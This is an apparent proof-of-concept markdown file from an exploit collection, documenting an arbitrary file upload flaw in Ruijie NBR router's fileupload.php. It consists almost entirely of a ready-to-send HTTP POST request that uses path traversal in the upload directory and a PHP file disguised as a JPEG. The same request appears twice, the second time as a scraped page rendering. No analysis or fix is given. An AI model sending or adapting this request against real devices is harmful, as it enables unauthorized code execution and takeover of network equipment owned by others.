POC/wpoc/锐捷/锐捷-NBR-路由器-fileupload.php-任意文件上传漏洞.md

## 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞

```
POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
Host: 
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg

<?php phpinfo();?>
```
first commit 2025-03-04 23:12:57 +08:00			`## 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞`

			```
			`POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1`
			`Host:`
			`Accept: text/plain, /; q=0.01`
			`Content-Disposition: form-data; name="file"; filename="111.php"`
			`Content-Type: image/jpeg`

			`<?php phpinfo();?>`
			```